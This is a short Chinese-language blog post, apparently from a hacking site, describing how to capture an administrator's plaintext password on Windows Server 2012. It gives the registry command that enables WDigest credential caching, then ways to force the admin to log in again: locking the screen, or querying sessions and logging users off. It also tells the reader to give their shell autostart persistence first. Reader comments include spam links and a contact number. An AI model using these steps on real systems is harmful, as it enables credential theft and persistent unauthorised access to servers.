windows2012抓管理员密码

修改注册表

reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\ /v UseLogonCredential /t REG_DWORD /d 1

选项一:锁屏

rundll32.exe user32.dll,LockWorkStation

选项二:注销

查询已登录用户的会话ID

query user

把你想抓的那个管理员注销掉或者把所有在线用户全部注销掉,注意:可能会导致shell无法访问,执行前先给shell加个自启动

logoff ID

参考文章
http://www.ansbase5.info/?p=136
http://blog.51cto.com/tianma3798/1735409

备注:强烈推荐注销!

Last modification:March 18th, 2020 at 11:52 am

3 comments

  1. uqkfusdlnq

    兄弟写的非常好 https://www.cscnn.com/

  2. dajiba

    我的QQ是 609267976 谢谢大佬

  3. dajiba

    OωO大佬,可以留个联系方式吗,想学习交流下.
    Hacked By:dajiba

Leave a Comment